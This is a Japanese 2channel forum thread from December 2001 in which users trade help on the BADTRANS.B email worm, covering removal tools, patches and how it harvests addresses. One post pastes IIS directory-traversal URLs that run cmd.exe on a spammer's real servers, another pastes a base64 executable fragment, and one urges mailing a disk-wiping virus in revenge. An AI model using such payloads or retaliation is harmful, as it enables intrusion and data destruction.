言っても聞かないものぐさ君は嫌だね(w
868名無しさん@お腹いっぱい。:01/12/12 00:13
>>865
>>866
即レスありがとうございます。
かなり強気の人なんでみんな引いちゃってるんですが
管理人に相談してみることにします。
ありがとうございました。
869862:01/12/12 00:56
訂正。
×ウイルスバスターには"除外"の機能がない
○ウイルスバスター コーポレートエディションには"除外"の機能がない

個人向け製品の方は未確認。
870とーとつですが:01/12/12 01:49
ずっとROMっていましたが、このスレにすごく助けられました。
2chねらーでヨカタ・・と実感。特にネット屋さんには、感謝!

「名も無き」親切な皆様、ありがとうございました。
871名無しさん@お腹いっぱい。:01/12/12 01:57
>862
情報ありがとうございます。
いつもサーバー上のメールを確認してから使っていたのに
つい受信をクリックしたら、ウイルスが入っていて
何通か無くなってしまいました。(おばか)
とりあえず少し安心。
872ホームページ開設人:01/12/12 02:02
バッドトランスBが11日現在まだ来てますがなにか?

新客が来訪するたびに来るよ。常連客だけなら終わってるだろうけど。
>>872
そんなのアンタだけじゃないだろ。
>>872
だから何?
誰に何を挑んでいるんだー??
875名無しさん@お腹いっぱい。:01/12/12 07:54
>>872
自分のHPが有名だと言いたいんでしょう。
そんな人たくさんいるのにねぇ。
876名無しさん@お腹いっぱい。:01/12/12 08:20
kernel.dll以外の正常なkernel(たぶんkernel.o20等)も削除してしまいましたが
大丈夫でしょうか?(今のところ何もおかしくはないですが心配です)
877ネット屋 ◆.t4dJfuU :01/12/12 08:25
>>872
まだ鎮火してないのかな?(4通目)必要かな?
878ネット屋 ◆.t4dJfuU :01/12/12 08:27
>>876
「.o20」なんて元々ないので、消して大丈夫なはずです。
879名無しさん@お腹いっぱい。:01/12/12 08:43
>>872
うちにも来ます。
「あなたのパソコン、ウイルスに感染している
恐れがありますよ」と返信すれば、未だに
「本当に感染しているのですか?何をどうすれば
よいのですか」という方も。
…まだまだ長引きそうですね。
昨日、取引先から「コンピュータウィルスに感染したから、メールが来てたら削除してくれ」
って電話があったよ。見てみたら「BADTRANS.B」だった。
未だに感染するヤツがいるんだ、と思ったよ(うちは対策済み)。
確かに、妙に長引いてるよね、コレ。
881  :01/12/12 09:10
サイト運営者の一人だけど細々とくるね、今でも。
最盛期が10数通/日、今は2日に1通ぐらい。
アクセスは200〜250位だから多い方ではなさそう。
ただ、気になるのは最盛期はいくらか謝罪+お礼メールが来ていたが、
最近は全然こないこと。
だから、新来かちょっと見ただけとかそんな人かなという気はする。

ついでに、昨日いった出先では一昨日の日付で、
ウイルスメール送付の謝罪メールが来ていたんだけど、
それがまあ、宛先にあちこちのメールアドレス羅列したやつ。
似たようなケースを別の出先でも見たし。
こういうのによる二時被害(ウイルスではなくても)も
心配だなあ。

妙に長引いている、には同感。
雑談めいてごめん。
882名無しさん@お腹いっぱい。:01/12/12 10:35
>864
そういうアホにはシステム破壊型のウイルスでも送っておけ
いや、マジでそうでもしないと懲りないぞ
次回起動時に deltree しちゃうようなやつがいいな
サイト管理者ながらも、三通届いただけで終了しました。
流行る前にさっさとアドレスをWEBから外した効果があったのかな。
ある種専門的なサイトだから、訪問者の方は防御策を施してる人達だろうし。

まあ、もともとそんなにアクセス数はないけどさ(イヂケ。
>>877
4通目、微妙なトコだね。
最近は1日に1,2通しか来ないので、
そろそろ終了かと思っていたのですが、
今日は6通も着た。
886教えて君でスマソです:01/12/12 12:42
ビギナーで良く解らず、慌ててマカフィを買った者ですが、役に立ちそうも
ないので、アンインストールして、トレンドマイクロとシマンティックのオン
ラインウイルスチェックをしようとDLしたのですが、トレンドマイクロはエラー
メッセージが出るし、シマンティックの方は途中で、何故か回線が切れてしまい
DL出来ません。どうしたらいいのでしょうか??
ビギナー故、何がどうなっているのかさっぱり解りません。
宜しくご教示下さい。
887名無しさん@お腹いっぱい。:01/12/12 12:44
ダウンロードに時間のかかる
Internet Explorer 6
Internet Explorer 5.5 SP2
Internet Explorer 5.01 SP2
のCD−Rを作る方法があります。

http://www.microsoft.com/japan/technet/prodtechnol/ie/deploy/
を見るといいです。
かなり面倒だけど、このCD−Rをいったん作ってしまえば、
大量のパソコンにインストールできます。
私はこれを作って大勢の初心者に貸してあげました。

ちなみに、Internet Explorer 6 をアナログ回線でダウンロードした人は
3時間かかったそうです。
>>887

Badtrans Bならマカフィでも反応するぞい
ただ、添付ファイルを保存するときでないと、
気づいてくれない。
質問の件はわしではスキル不足でわからんのう・・・

http://pc.2ch.net/test/read.cgi/sec/1007480057/

で質問した方がいいかもしれんのう
>>886
エラーメッセージの内容がわからないと、誰も答えようが
ないでしょう。
890 :01/12/12 13:36
>>886
素直に役に立ちそうもないマカヒでチェックすればよいのでは・・・
DATファイルは最新にしてね。
>>887
ほほう!MSがIE5.5SP2の類を雑誌の付録につけないのは
なにか戦略的な事(コピーユーザーを含む全てのWinユー
ザーにWindows Updateを使わせる等)が理由だと思って
いたので意外だな。
ウイルスメール送りつけてどないすんじゃゴラァとその筋の方に脅された方はいますか
893ネット屋 ◆.t4dJfuU :01/12/12 14:05
>>886
シマンテックのオンラインチェックは、赤い四角が左から出てきて、緑になって
右に流れて行く画面になったら回線を切ってもいいんじゃないのかな?
894ななし:01/12/12 14:11
エシュロンもさ、軍事情報ゲットするんじゃなくて
こういう迷惑ウイルス作ってながした奴を
チェックして摘発してくれればいいのにね
895名無しさん@お腹いっぱい。:01/12/12 16:12
>>887
これIEAK6とかいうのをインストールする必要があるが、
対応OSが98、NT4.0、2000しかないのは困ったもんだ。
MEやXPしかない場合はどうすんだ。
896ネット屋 ◆.t4dJfuU :01/12/12 16:27
>>895
うーん、
https://ieak.microsoft.com/ja/download/ordercd.asp
これでCDを15$で買うしかないかも。
897895:01/12/12 17:09
>>896
CD買ってもOSがMEなんでIEAK使ってIEのCD−R作れないんですよ。
知り合いにいまだWin98+ノーマルIE5.5or5.0+ダイヤルアップ接続の人が
何人かいて救済してあげたいんだけど、ダメですね。
雑誌の付録にIE6.0付けてくれれば即解決なのに。
898ネット屋 ◆.t4dJfuU :01/12/12 17:35
>>897
あ、そうか!これIEAKのツールですもんね。
IE6の収録雑誌ってないですもんね。なるほど。困りましたね。う〜ん。
899名無しさん@お腹いっぱい。:01/12/12 17:52
素人ですいません。教えてください。
BADTRANS.Bに感染すると多くの人に自動的に
同じウイルスを送信して被害を続出してしまう
ということを知りました。
私が知るBADTRANS.Bの被害知識はこれだけです。
他にもあるのでしょうか?
これ以外にも何かBADTRANS.Bがもたらす被害
及び危険性があれば全て教えてください。よろしくお願いします。
900名無しさん@お腹いっぱい。:01/12/12 17:55
2つのファイルが
W32.Badtrans.B@mmに感染してしまいました。
エーン><
901ネット屋 ◆.t4dJfuU :01/12/12 17:57
>>899
感染中にキーボードから入力した内容をぶっこぬかれます。>>2
【病気の詳細情報】を見てください。
902899:01/12/12 18:16
>ネット屋さん
ということはメ−ルボックス内やハ−ドディスク内
を見られる可能性も在りですか?
また見れるのはウイルスを最初に撒いた張本人のみですか?
知識不足ですいません。
903九州男 ◆8U2HuhRg :01/12/12 18:20
>902

少しはトレンドマイクロとかシマンテックでしっかり
情報を仕入れてから質問しなさい。
904ネット屋 ◆.t4dJfuU :01/12/12 18:21
>>902
無いです。撒いた張本人かどうかはわかりませんが、特定のメールアドレスに
情報を載せたメールを出すそうです。
私はウィルスの作者でもないし、バイナリの解析もしていません。
とにかく>>2の【病気の詳細情報】
http://www.trendmicro.co.jp/badtrans/
http://www.ipa.go.jp/security/topics/newvirus/badtrans-b.html
http://www.symantec.com/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html
http://www.nai.com/japan/virusinfo/virB.asp?v=W32/Badtrans@MM
http://www.nai.com/japan/virusinfo/badtrans_zukai.asp
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000672.htm
を見てください。見られない事情がおありですか?
>>864のその後が気になる…
906名無しさん@お腹いっぱい。:01/12/12 18:30
OE5使っていて感染してしまいました。
SP2というのがよく分からないのですが
とりあえず
トレンドマイクロ社から対策ツールと
シマンテック社からも対策ツールをダウンロードしました。
他にすることありますか?
>>906
過去ログ読んだ?
908名無しさん@お腹いっぱい。:01/12/12 18:38
簡潔に教えて下さい。
909ネット屋 ◆.t4dJfuU :01/12/12 18:43
>>908
では簡潔に。>>1-9

P.S.
4通目建てるの辞めた。もう役目は果たしたな。
910名無しさん@お腹いっぱい。:01/12/12 18:45
いじわるなんだね!
詐欺師じゃん。
こんなとこに書き込むより早くウィルス駆除した方がよいですよ。
そんでIE5はSP2にしてOEじゃないメーラーにして
アンチウィルスソフト入れて。
ああ…ネット屋さんご苦労様でした…
913名無しさん@お腹いっぱい。:01/12/12 18:48
OE使っちゃ逝けないの?なんで?
アンチウィルスソフトって何?
BADTRANS関連情報を漁ってたらこんなんをセキュリティ板でハケーン
(猛威をふるう BADTRANS.B Re: メール (3通目)
http://pc.2ch.net/test/read.cgi/sec/1007344514/

 ダウンロードに時間のかかる
 Internet Explorer 6
 Internet Explorer 5.5 SP2
 Internet Explorer 5.01 SP2
 のCD−Rを作る方法があります。

 http://www.microsoft.com/japan/technet/prodtechnol/ie/deploy/
 を見るといいです。
 かなり面倒だけど、このCD−Rをいったん作ってしまえば、
 大量のパソコンにインストールできます。
 私はこれを作って大勢の初心者に貸してあげました。

 ちなみに、Internet Explorer 6 をアナログ回線でダウンロードした人は
 3時間かかったそうです。
915名無しさん@お腹いっぱい。:01/12/12 18:49
SP2って何?
IE6にしろってこと?
早く直したいから的確なアドバイスよろしくね
すすすすいません大誤爆しました
 ________
〈 ドウモスミマセン
 ∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 (´Д`;)ヾ
   ∨)
   ((
917あとは自分で調べろ:01/12/12 18:53
918名無しさん@ご立腹:01/12/12 18:54
>>915
単なる煽りに等しい。
相手しないのが一番と思われ。
>>915
ネタじゃないの?
初心者のフリしてかまって欲しいだけのかまってチャン?
920名無しさん@お腹いっぱい。:01/12/12 19:12
ほんとにわかんないから聞いてるのにさ〜〜〜
かまってちゃんですよ!ご・めん・ね!!!
921名無しさん@お腹いっぱい。:01/12/12 19:20
>915
>IE6にしろってこと?

そうだよ
過去ログ
http://pc.2ch.net/test/read.cgi/sec/1006787500/
http://pc.2ch.net/test/read.cgi/sec/1007075829/
を落としてからケーブル引っこ抜いて↑を熟読したらいいのでは。
>920
ちょっと聞きたいんだけどさ
アンチウィルスソフトとかお金出して買ってるの?
・ネットワーク脆弱性スキャン
・NetBIOS 有効性スキャン
・ブラウザプライバシースキャン
要注意!なんて出ちゃってさ・・・・・・・・・
緊急って感じ???!! みんな本当に安全なの>?
924九州男 ◆8U2HuhRg :01/12/12 20:07

>923

とりあえずファイヤウォールいれろや・・・
フリーでもあるし。
そうすればほとんどクリアできるよ。
やくざですか?
でも教えてくれて有り難う。
ファイヤウォールダウンロード時間長くないです化?
(いまだアナログ回線・・・藁)
テレホーダイで頑張ってね
927九州男 ◆8U2HuhRg :01/12/12 21:01
>925

何でヤクザなんだよ(w
俺はゾーンアラーム入れてるがな・・・
アナログでも10分くらいだろ?

まあ最後のブラウザプライバシー項目はこれだけ
じゃクリアできんけどね。
928872:01/12/13 00:31
>>873-875

まえに収束したと書き込みがあったから
収束してないことを伝えたんだろうが。
文脈ちゃんと捉えろや。
ボケたつっこみすんな、ドアホ!
929a:01/12/13 00:38
a
930:01/12/13 00:40
>>928

どこにでも厨房は、いるもんです。やつらはほっとけばいちばん。
872はどこでも嫌われると思われ
932こうじ:01/12/13 01:00
ちょっと聞きたいのですが、Badtransウイルスのメ−ルが
送られてきたら削除しても
ゴミ箱に残っているとどうなるのでしょうか?また感染してそのまま
サイトなどを見ると見られたサイトは
どのような被害を受けるのでしょう?難題かもしれませんが、
教えてください。
>>932
君の書きこみの解読がまず難題だ。
>>932
緊急性のない質問と考えていいかね。
君は自分なりにどういう考えているの?
935七誌:01/12/13 01:13
>>931

無駄なこと書くなよ。こっちはマジ困ってんだよ。タコ!
ネット屋さんお疲れサマでした。

>>935
>>1-9参照
>ゴミ箱に残っているとどうなるのでしょうか
・・・何もおこりません
>サイトなどを見ると見られたサイトは
どのような被害を受けるのでしょう?
・・・そのサイトの何処かにメアド晒してなければ何もおこりません。
メアド晒してあれば、其処宛にウイルスメールが届きます。

>無駄なこと書くなよ。こっちはマジ困ってんだよ。タコ!
・・・というか、氏ね。イカ!
938932:01/12/13 01:36
難し過ぎる質問してすいません。
でも知りたいのです。
>>938=932
>>937参照
940九州男 ◆8U2HuhRg :01/12/13 01:52
しかしここまで流行ってても知識が無い人って居るんだね。

ついさっきも俺が入ってるMLで思いっきり勘違いヤロー
が投稿してたよ(w
入ったばっかりでいきなり嫌がらせとは
酷いですゥー
私の投稿はそんなに不快でしたか?
みたいな内容・・・

思いっきり管理者にたしなめられてたけど(w
>>895
まだ見てるかな
他の方法があるんだけど調べるのにちと時間がかかるもんで
942名無しさん:01/12/13 03:22
自分が他人に勝手に送っちゃったメールっていうのは
送信済みメールに残っているのですか?
943九州男 ◆8U2HuhRg :01/12/13 03:31
>942
残りません。
トレンドとかシマンテックあたりで情報仕入れましょう。
ネット屋さん、九州男さん、ほんとにホントにお疲れ様でした。
正直、2ちゃんでここまで親切な方々を見たのは初めてです。
Offで会ってたら惚れていたかも(w
3通目まで来るとは思わなかったけど、毎日読んでて楽しかったな。

PS,マジでみんな質問する前に過去ログ見ようYo!
945九州男 ◆8U2HuhRg :01/12/13 04:00
過去ログまではきついでしょう(w
>1-9まで読めばよいでしょう。
946名無しさん@お腹いっぱい。:01/12/13 04:16
うわー、たった今来たよ。

うちはIE5.01SP2だから大丈夫なのか?
メーラーはMozillaメッセンジャーで添付ファイルはなにもついてないように見える。
だから多分添付ファイルは実行してない・・・と思う。

題名だけで中身がないから怪しいと思ったら案の定ノートン先生が反応してくれたよ。
最新のウィルス定義でウィルススキャン中。
947_:01/12/13 05:45
TBSのNews23から、来ていた。
参ったよ・・
948どっきゅん:01/12/13 07:37
あのさあ、このウイルスはやってるっていうけど、
俺のところには1通もきてないんだよね。
なぜ?
ヤフーとかのフリーアドレスに変なメールはくるけど、
サブジェクトはRe:じゃないし。
プロバイダの方のアドレスにもこないし、
会社の方のアドレスにもこない。
なんで?
949  :01/12/13 08:03
>>948
誰にも相手にされないからでわ?
>>928
の元の書き込み(>>872)は>>928で弁明している意味か? とも思ったが
言外の含み(「例えば」>>875とか)で矛先の方角と形状が
あらぬ方に逝っちゃってるように見えるが。
>>928の意味合いなら>>859にもあるので
同じ意味合い(と>>872=>>928の主張するところの)で
こうも書き方が違うところに
>>872にバックグラウンドで立ち上がってる
「自慢したい臭」がぷんぷん臭っているということに
>>872=>>928は気づいていないと思われ。

スレ趣旨に反した書き込みスマソ。
951どっきゅん:01/12/13 08:23
>>949
いや、メールアドレス4つ仕事関係、友達関係、ETCとあって
普通のメールはそれなりにくるよ。

というか、俺のまわりセキュリティに詳しい連中が多いからだろうな。
952  :01/12/13 08:34
>>951
仕事用とか交友関係のメールアドレスは一つも来ず、
Webサイトのメールアドレスのみに沢山来るという例も多い。
グチっているのはこういうパターンのケースが多いよ。
キミもやってみれば分かるよ。
まあ、この話は続くなら雑談スレに移ろう。
>>950に至る話の方もね。
>>948
そんなに聞かれたってわかるわけないだろ。
どういう答えを期待しているんだ?
>>951
とりあえず、いい友達ばっかりでよかったね。そんだけ。
955名無しさん@お腹いっぱい。:01/12/13 16:27
このスレ本当に有難いです。

>>800,861
>●受信トレイにある送信者に送る
>●受信トレイの未読メールの送信者に送る
>と二通り出てくるんですが、本当の所はどっちなんでしょうか?

私も気になってたので調べてみました。

未読が無いはずなのに「きたよ〜」と友人たちから連絡もらったので
protocol.dllを見たら
受信トレイの中に入っている送信者のアドレスがびっしり。
未読とは限らないような…。まさかうちだけ??

うちは非プレビュー、Ver.5.5SP2パッチ当ててたのに
クライアント先から「Re:data」でひっかかってしまいました。(泣)
(以前送ったメールの件名を利用するという罠)
>>955
IEで見たページに書いてあったアドレスにも送信するから。
957955:01/12/13 19:00
>>956

もちろんそのファイルの中には
閲覧してキャッシュに残ってるだろうHP上のメールアドレスもあるんですが
届いた人達と掲示板で会うわけでもなく
その人達はHPを運営等してメールアドレスを晒してません。

参考になるかどうかわかりませんが
protocol.dllのアドレスの並びは
受信トレイの中の
古い日時に受け取った送信者順にリスト化されてます。
(ソートを日付順にしてます)
(サブフォルダの送信者はリスト化されてません)

その続きに閲覧HP上アドレスがリスト化されてます。

もしかすると既読メール送信者に送りつける条件として
「受信トレイに未読メールが無い」場合のみ
既読メールの送信者に自動配信してしまうのでしょうか?

うちのパソコンは未読メールがある状態がほとんど無いので…。

当たり前だけど、ここでいう「未読メール」って「既読」ではないメールの事ですよね…。
ちなみにウイルスにかかったのは12月6日です。
駆除はシマンテックのBadTrans.B対策ツールでできました。
958ネット屋 ◆.t4dJfuU :01/12/13 19:12
>>957
12/6以前に受信したメールへの送信はありましたか?
959955:01/12/13 19:23
ウイルスを受け取ったのは12月6日が初めてです。
960名無しさん@お腹いっぱい。:01/12/13 19:54
訳あって、IE6+OE5.50.4807.1700ですがこれで大丈夫ですか?
961しつもん:01/12/13 20:30
>>955さんに便乗で質問します。

BADTRANS.Bが取得するアドレスは、Temporary Internet Files内の
htm、html、aspファイルなど、および受信トレイのメールから、という
ように認識しています。
ところが一部解説、および掲示板の書き込み等でアドレス帳から取得
するという記述があるのですが、これは本当のところどうなんでしょうか。
シマンテックとトレンドマイクロのページには「アドレス帳から」という
はっきりとした内容は載っていなかったのですが。

単なる好奇心の質問ですが、よろしくお願いします。
>>961
「.B」って付いてるのは何でだと思いますか?
963961:01/12/13 21:00
>>962
BADTRANS.Aという初期のワームに対して、その後発の亜種であるという
意味だと解釈しています。
964ネット屋 ◆.t4dJfuU :01/12/13 22:16
>>959
えっと、12/6に感染し、感染中に一瞬でも未読になったメールに対し、病気
メールを送信したのではないか?と言う意味(疑問)なんです。12/6以前に
受信し、なおかつ、12/6以降受信していないメールアドレスに対する病気の
発信がProtocol.dllに記録されているか?と言うのが判れば、わかりそう
なんですが、どうでしょうか?
965ネット屋 ◆.t4dJfuU :01/12/13 22:20
>>960
IE6なら大丈夫だと思います。
>>961
そうなんですよ。謎なんです。現在>>964のように、未確認です。
966名無しさん@お腹いっぱい。:01/12/13 22:49
オレのフリメのアドレスはすごい。あらゆる有名ウィルスが着てるぞ。
ネット屋さんはじめ、皆さまお疲れさまでした。
ウィルスの凄さを、改めて思い知った20日間でした。
今回のウィルスメールに対応出来たのは、このスレのお陰です。
自分はマカーですが、届くものだけはどうしようもなかったので。
Badtrans.Bを教訓とするユーザーが、ひとりでも増えるよう祈ります。
本当にありがとうございました。
968名無しさん@お腹いっぱい。:01/12/14 00:09
過去ログを読んだつもりですがガイシュツでしたらすみません。
友人がウィルスにかかって、トレンドマイクロのツールで削除し、
トレンドマイクロ&シマンテックのオンラインスキャンをしたら、
シマンテックの方で「kdll.000」というのが引っかかって
駆除できないって事なんですが、
これって削除してよいものですか??
>>968
拡張子、変更してあるぢょ。。
ツール使うとこういう駆除の仕方するのきゃ??

駆除済みのゴミ・・多分そうだにゃ。。
サイト見に逝くのメンドイ(w
970955:01/12/14 00:17
>>964

勘違いしてすみません。

Protocol.dllのアドレスリストの先頭は8/21に受信したもので
〜12/3まで受信した人までのものでした。
(新規PCなので、それ以前のはありません。
12/3〜12/6の間は、ウイルス付メッセージ以外は
メッセージルールで振り分けてるものしか受信していません)

特に8/21に受け取ったメールのアドレスは、(Protocol.dllの先頭に書かれたアドレス)
某メーカーに商品の問い合わせをした時の返信メールなので
8/21以降受信していません。(もちろん既読になっています)
ウイルスをばらまいた時、その某メーカーのセキュリティチェックにひっかかって、
警告メールが戻ってきたので驚いたぐらいです。
それ以外でもオンラインショッピング等で
1度しか受信していない会社のアドレスも受信順でリストにありました。
もちろん既読になってます。

質問に上手く答えられてるかわかりませんが・・・。
971ネット屋 ◆.t4dJfuU :01/12/14 00:36
>>970
なるほど。確定臭いですね。未読メールが残っていた場合、それが
優先されるのかどうかはわかりませんが、未読がなかった場合、受信トレイ
にあるメール全てに送信されると言う結果のよう、と言うことでよろしいで
しょうか?
>>968
消してしまえばOKだと思います。
972名無しさん@お腹いっぱい。:01/12/14 00:47
一度ウイルスに感染して、その後なんとか駆除できたのですが、
そのままパスワードとか変えなくても大丈夫でしょうか?
973名無しさん@お腹いっぱい。:01/12/14 00:57
念のため変えとけ。
974968:01/12/14 01:32
>>969 >>971
ありがとうございます!
975GOODTRANS.B:01/12/14 02:40
>>950

>「自慢したい臭」がぷんぷん臭っているということに
> >>872=>>928は気づいていないと思われ。

気づいていないんなら自慢してはいないんだろ。872の文を読んでも俺ならなんに
も思わないよ。872を読んで反感もつのはおのれのひがみの裏返しだけだろ。
自慢してないのに自慢してると感じる人間のほうが反省すべきだな。
スレ違いでスマン。
976初心者:01/12/14 02:41
パスワードの変更ってプロバイダとかヤフーのもですか?
977名無しさん@お腹いっぱい。:01/12/14 02:54
私に来たウイルス付きメールも、
10月に友人に出したメールのRe:メールでした。(タイトルに覚え有り。)
本人に確認してみたら、とっくに既読とのこと。

>>971
でネット屋さんがおっしゃる結論に、当てはまるかと思います。
978第三者中継可能? :01/12/14 06:24
From:Mad Hornet [email protected]
To: [email protected]
Subject:Friend,IMPORTANT NOTICE!
Date:Thu, 5 Dec 2001 25:61:65 -2600
Received: from [65.212.106.124] by hotmail.com (3.2) with ESMTP id
MHotMailIUOIUOL543543463JL;Moon, 32 DEC-HP 3001 27:70:80 -2700
Received: from lsmail1 (208.254.217.79) by lsmail5.oii1.net (LSMTP for Windows NT v1.1b)
with SMTP id < [email protected] >;
Moon, 1 DEC-INTEL 3001 30:90:70 -3700
From [email protected] Sun, 20 DEC 3001 36:100:80 -7000

Friend,
You'll recall that, per our TOS (Terms of Service), you wisely agreed to receive
third party promotions from our network's preferred affiliates. So we now have the pleasure of
introducing you to a few of the benefits you can expect
from The Opt in NetworkTM. http://www.opt-track.net/
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]
++++++++++++++++++++++++++++++++++++++++++++++++++++++
This email is not sent unsolicited. This is a Opt In Network mailing!
This message is sent to subscribers ONLY.
The e-mail address you subscribed with is: [email protected]
To unsubscribe please click here.
or
Send a blank email to [email protected]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
lsmail5.oii1.net
<<< 220 lsmail5.oii1.net (LSMTP for Windows NT v1.1b) ESMTP server ready
>>> HELO rlytest.nanet.co.jp
<<< 250 lsmail5.oii1.net says hello to rlytest.nanet.co.jp
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ [email protected] >
<<< 250 Ok
>>> RCPT TO:<[email protected]>
<<< 551 Message relaying to this domain disabled

Nimda CodeRed NetBus?
http://www.opt-track.net/
http://www.opt-track.net/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
http://www.opthost.com/
http://www.opthost.com/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

http://lsmail5.oii1.net/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
979ネット屋 ◆.t4dJfuU :01/12/14 08:11
>>976
感染中に手入力したものは、念のため変えたほうが、と言うことですね。
>>977
情報ありがとうございます。確定としましょう。
>>978
ちょっと意味がわからないのですが、BADTRANS.BもMindaのように、
不特定の他人に成りすましてメールを送る可能性があると言うことでしょうか?
980955:01/12/14 09:59
>>971>>977>>979
ネット屋さん他、いろいろとありがとうございました。
既読メールも気をつけなければ、という事ですね。

このウイルスに限って
メッセージルールに「_*」というアドレスは削除
という事にしておけば被害が減りますかね。

メールでのワイルドカードの使い方はこれであってますか??
981名無しさん@お腹いっぱい。:01/12/14 10:10
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAAoxs1SbKejAWynowFsp6MBF7uvAWinowHvu60BbqejAYS4qQF2p6MBhLin
AW6nowEOuLABZaejAWynogHyp6MBhLioAWCnowHUoaUBbaejAVJpY2hsp6MBAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAUEUAAEwBAwCoIP47AAAAAAAAAADgAA8BCwEGAABwAAAAEAAAANAAAEBHAQAA
4AAAAFABAAAAQAAAEAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAYAEAAAQAAAAAAAACAAAAAAAQAAAQ
982950:01/12/14 11:37
>>975
ああ〜?
「気づいてない」から「言外の含み」で「バックグラウンド」って表現なんだが
自分に都合のいい表現しか目に入ってないみたいだなあ。まあそんなもんだろ(藁
ちなみに漏れも「ホムパゲ開設人」で「ご新規さんなり常連さんなりから
来てる」が、気分的には>>859なので
似た立場なのに、随分違う観点から
切り込むもんだなーと感心したと言う方が正解ね。
…というような状況で「おのれのひがみ」とカンタンに切り返して
ツボ突いた気に>>975がなってるとしたらまあ2ちゃんの慣習ゆえの錯覚だろうと
個人的には思う、がマジにスレ趣旨に反するし
こんなこたどーでもよろしいのでもう漏れ逝って帰って来ないっス。公害カキコスマソ。
983ネット屋 ◆.t4dJfuU :01/12/14 11:45
>>980
「*」は使えないんじゃないかな?メッセージルールにワイルドカードって概念が
無いような気がします。
(件名に「Re_:」を含む)ってのでどうでしょうか?
984九州男 ◆8U2HuhRg :01/12/14 14:34
そろそろ終わりに近づきましたね。
特にネット屋さんご苦労様でした。
他のななしさんもありがとう。

色々勉強になりました。
またどこかで。。。。
985名無しさん@お腹いっぱい。:01/12/14 14:59
OPEFPNOP.EXEってウイルスですか?
986ネット屋 ◆.t4dJfuU :01/12/14 15:10
>>984
はい、お疲れさまでした。私が感染したらまた出てくるかもしれません(^^A;
どこかでお会いしましょうね!
>>985
BADTRANS.Bではないです。他のスレをどうぞ。

わたしもだいぶ勉強になりました、みなさんありがとうございました。
ちょっと早いですが良いお年を!^-^)/
9871000?:01/12/14 16:41
 
9881000!:01/12/14 16:42
  
989名称未設定:01/12/14 17:39
 マカの私が初めてウィルスを意識して(あんまりたくさん来るからね)
初代スレが立った頃からイロイロと勉強させて頂きました。
みなさんありがとうございます〜。

4通目は…ナシで済むと良いねぇ(*゚−゚)
990名無しさん@お腹いっぱい。:01/12/14 23:37
こんなところ見つけたけど、ところどころ微妙に間違っているなぁ・・
http://www.5012.jp/contents/info/badtrns.htm
991955:01/12/15 01:24
>>983
ワイルドカード無効ですか…。残念。

ネット屋さんありがとうございました。
その他のみなさんお疲れ様でした。
本当に勉強になりました。
992GOODTRANS.B:01/12/15 03:09
>>950
俺もホームページもっていて、それも弱小&アクセス数少だ。でもね、まだBADTRANSが1日2通は来る。
つまり、BADTRANSが来ることは自慢にもなっとらんと俺は思うのだよ。

まあ、人間のできた人=872に反論書き込みしない
   ひがみ根性丸出しの人=872に文句つける
ってのは事実だと思うぞ。よく内省してみろよ。「ひがみの裏返し」ってのが
本当に的はずれだと思うか? スレ違いゴメソ。sage
993GOODTRANS.B(992):01/12/15 03:14
>>982

950=982で、992は982への返信だった。(w
9941000ゲット:01/12/15 03:20
1000!
9951000ゲット:01/12/15 03:21
1000!
9961000ゲット:01/12/15 03:23
千!
9971000ゲット:01/12/15 03:24
この時間はだれもいないなあ。
9981000get:01/12/15 03:29
1000を君にあげる。
999名無しさん@お腹いっぱい。:01/12/15 04:27
それでは
1000名無しさん@お腹いっぱい。:01/12/15 04:28
いただきます
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。